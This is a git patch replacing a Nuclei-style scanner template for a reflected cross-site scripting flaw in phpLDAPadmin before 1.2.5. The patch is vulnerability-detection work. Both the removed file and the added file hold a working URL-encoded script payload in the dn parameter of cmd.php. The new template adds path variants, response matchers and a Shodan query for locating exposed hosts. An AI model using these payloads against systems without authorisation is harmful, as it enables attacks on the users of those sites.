From 9c29ff3819e44bd45142e2a694f876dcbb4a16bc Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 12 Sep 2023 14:54:31 +0530
Subject: [PATCH] complete template update
---
custom-phpldapadmin-xss | 16 -------
.../other/phpldapadmin-xss.yaml | 47 +++++++++++++++++++
2 files changed, 47 insertions(+), 16 deletions(-)
delete mode 100644 custom-phpldapadmin-xss
create mode 100644 http/vulnerabilities/other/phpldapadmin-xss.yaml
diff --git a/custom-phpldapadmin-xss b/custom-phpldapadmin-xss
deleted file mode 100644
index 44908e3582..0000000000
--- a/custom-phpldapadmin-xss
+++ /dev/null
@@ -1,16 +0,0 @@
-id: custom-phpldapadmin-xss
-info:
- name: Custom PHP LDAP Admin XSS Detection
- author: GodfatherOrwa, herry
- Reference : https://twitter.com/GodfatherOrwa/status/1701392754251563477
- severity: medium
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/phpldapadmin/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(%27Orwa%27)%3C/ScRiPt%3E&meth=ajax&server_id=1"
- matchers:
- - type: word
- words:
- - ""
- part: body
diff --git a/http/vulnerabilities/other/phpldapadmin-xss.yaml b/http/vulnerabilities/other/phpldapadmin-xss.yaml
new file mode 100644
index 0000000000..2577f1202d
--- /dev/null
+++ b/http/vulnerabilities/other/phpldapadmin-xss.yaml
@@ -0,0 +1,47 @@
+id: phpldapadmin-xss
+
+info:
+ name: PHP LDAP Admin < 1.2.5 - Cross-Site Scripting
+ author: GodfatherOrwa,herry
+ severity: medium
+ reference:
+ - https://twitter.com/GodfatherOrwa/status/1701392754251563477
+ metadata:
+ max-request: 3
+ verified: true
+ shodan-query: html:"phpLDAPadmin"
+ tags: php,phpldapadmin,xss
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ - "{{BaseURL}}{{path}}/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&meth=ajax&server_id=1"
+ - "{{BaseURL}}{{path}}/index.php?redirect=true&meth=ajax"
+
+ attack: pitchfork
+ payloads:
+ path:
+ -
+ - /htdocs/index.php
+ - /phpldapadmin
+
+ stop-at-first-match: true
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - "No such entry"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200